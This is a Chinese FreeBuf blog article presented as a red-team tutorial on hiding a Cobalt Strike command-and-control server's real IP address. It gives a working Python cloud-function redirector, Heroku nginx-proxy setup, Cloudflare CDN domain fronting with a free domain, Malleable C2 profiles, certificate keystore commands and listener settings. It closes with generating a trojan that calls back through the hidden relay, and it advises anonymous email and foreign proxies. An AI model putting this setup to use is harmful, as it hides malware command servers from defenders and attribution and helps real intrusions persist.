freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

红队攻防之隐匿真实Cobalt Strike IP
2021-04-15 20:49:26

云函数隐匿真实IP

本次实验利用的腾*云:(其他也相同)

点击新建云函数,选择创建方式—自定义创建,函数名称自定义或者默认都可以,运行环境选择python3.6,其他版本也行。

1618485794_607822220d09fb54b9630.png!small?1618485794028

云函数代码如下(可先点击完成,后面再补进去):

# -*- coding: utf8 -*-
import json,base64,requests
def main_handler(event,context):
    C2 = 'http://IP:PORT'
    headers = event['headers']
    path = event['path']
    ip = event['requestContext']['sourceIp']
    headers = event['headers']
    headers['X-Forwarded-For'] = ip
    print(event)
    if event['httpMethod'] == 'GET':
        resp = requests.get(C2+path,headers=headers,verify=False)
    else:
        resp = requests.post(C2+path,data=event['body'],headers=headers,verify=False)
        print(resp.headers)
        print(resp.content)

    response={
        "isBase64Encoded":True,
        "statusCode":resp.status_code,
        "headers":dict(resp.headers),
        "body":str(base64.b64encode(resp.content))[2:-1]
    }
    return response

然后创建触发器,具体配置如下图:

使用API网关来进行触发函数。

1618486093_6078234d0f4546169f1ef.png!small?1618486093126

1618486101_60782355ccb6c43b29cc8.png!small?1618486101910

然后配置一下网关API路径:

1618486142_6078237e37fca7ee044bb.png!small?1618486142198

1618486150_6078238604badc653233b.png!small?1618486150015

1618486181_607823a5a83e935d60a4a.png!small?1618486181849

选择立即完成并发布任务即可。

这里配置完成后,我们得到API网关地址如下图:

1618486286_6078240ecae818bdd2828.png!small?1618486286936

记一下该地址,等下需要用到。

接着先去修改profile文件,配置文件http-config设置如下:

http-config {
        set headers "Server, Content-Type, Cache-Control, Connection, X-Powered-By";
        header "Server" "Nginx";
        header "Content-Type" "text/html;charset=UTF-8";
        header "Cache-Control" "max-age=1";
        header "Connection" "keep-alive";
        set trust_x_forwarded_for "true";
}

这里是为了与上面的云函数同步使用X-Forward-For来获取真实ip。

然后我们就可以去CS中

创建一个监听器,配置如下图,HTTP Hosts处 和 HTTP Host(Stager)处填入刚才获取到的API网关地址(Port 一定要是80)。

如在云函数中指定了port,则需要创建两个监听器。

1618486491_607824dbd8df1d484261b.png!small?1618486491979

生成木马即可上线。

1618486742_607825d6b4c3d7ffc6a50.png!small?1618486742824

Heroku代理隐匿真实IP

Heroku是一个支持多种编程语言的云平台即服务。

其实简单来理解就是通过Nginx反向代理的方式,从heroku服务器代理到我们真实的CS服务器。

首先:

注册heroku账号,这里需要注意的是QQ邮箱和163等国内邮箱注册不了,建议使用匿名邮箱。
地址:https://dashboard.heroku.com

注册成功后进行登录,访问以下网址进入配置页面。
https://dashboard.heroku.com/new?template=https://github.com/FunnyWolf/nginx-proxy-heroku

1618486860_6078264c3df710a074f33.png!small?1618486860319

填写App name以及TARGET(可以使用域名或直接使用IP,端口在创建监听器时用作监听端口)

点击 Deploy app 进行创建容器就可以不用管了。

回到Cobaltstrike,在Cobaltstrike中配置两个监听器

第一个监听器设置PAYLOAD为Beacon HTTPS,HTTPS Hosts为CS IP,HTTPS Port为7443端口(第二步设置的端口)。

1618487161_60782779203529d0b42a6.png!small?1618487161122

继续配置第二个监听器,同样设置PAYLOAD为Beacon HTTPS,HTTPS Hosts设置为huaweiapi.herokuapp.com,也就是之前获取到的heroku的域名。

HTTPS Port设置为443。(这里一定要443

1620191981_60922aed108b3d00030ce.png!small?1620191981266

生成木马时,监听器设置为:第二个Beacon 即:heroku2

CDN隐匿真实IP

申请免费域名

https://my.freenom.com

在申请的时候直接输入 xxxxxxx.tk  否则可能会显示该域名被注册。

最好能开个代理,代理位置设置在美国(和个人信息中的国籍相同),否则一个域名有极大概率会申请失败。

1618488445_60782c7dd7a7f8b4075c8.png!small?1618488445900

然后去

https://dash.cloudflare.com

添加cdn站点:

1618490061_607832cde7a7340ffd92e.png!small?1618490062965

这一步直接继续,

1618488891_60782e3b010cd9ad8ef76.png!small?1618488891031

自动生成dns地址

1618490029_607832ad50f852c3c605d.png!small?1618490029366

复制这两条放到freenom处:

1618490111_607832ff201a723da9c41.png!small?1618490111220

cdn上关闭自动https重写和始终使用https、broti压缩:

1618489257_60782fa968d6c827cecf4.png!small?1618489257536

1618489265_60782fb15dce7dc4920d6.png!small?1618489265348

1618489272_60782fb80b5c81e1aa9b2.png!small?1618489272071

接着添加DNS:1618489445_60783065cab0f9aa1d207.png!small?1618489445939

生成证书

保存公钥以及私钥

1618489531_607830bb3b87913371d7a.png!small?1618489531285

第一个保存pem,第二个保存key文件(复制即可)


1618489567_607830dfca773a420ed51.png!small?1618489567931

将证书打包并生成store文件

openssl pkcs12 -export -in server.pem -inkey server.key -out xxx.xxxxxx.tk.p12 -name xxx.xxxxxx.tk -passout pass:123456
keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore xxx.xxxxxx.tk.store -srckeystore xxx.xxxxxx.tk.p12 -srcstoretype PKCS12 -srcstorepass 123456 -alias xxx.xxxxxx.tk

再创建一个.profile文件

https-certificate { set keystore "xxx.xxxxxx.tk.store"; set password "123456"; } http-stager { set uri_x86 "/api/1"; set uri_x64 "/api/2"; client { header "Host" "xxx.xxxxxx.tk";} server { output{ print; } } } http-get { set uri "/api/3"; client { header "Host" "xxx.xxxxxx.tk"; metadata { base64; header "Cookie"; } } server { output{ print; } } } http-post { set uri "/api/4"; client { header "Host" "xxx.xxxxxx.tk"; id { uri-append; } output{ print; } } server { output{ print; } } }

把xxxxx.profile和xxx.xxxxxx.tk.store拷贝到cs服务器上

执行

./teamserver ip password ./xxxxx.profile

客户端上监听:

1618489989_6078328584b4498400df0.png!small?1618489989599

可监听的端口

http:

80、8080、8880、2052、2082、2086、2095

https:

443、2053、2083、2087、2096、8443

本文作者:, 属于FreeBuf原创奖励计划,未经许可禁止转载

# Cobalt strike # RedTeam # 红队攻防 # Cobalt Strike
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按热度排序

登录/注册后在FreeBuf发布内容哦

相关推荐
\
  • 0 文章数
  • 0 评论数
  • 0 关注者
文章目录
登录 / 注册后在FreeBuf发布内容哦
收入专辑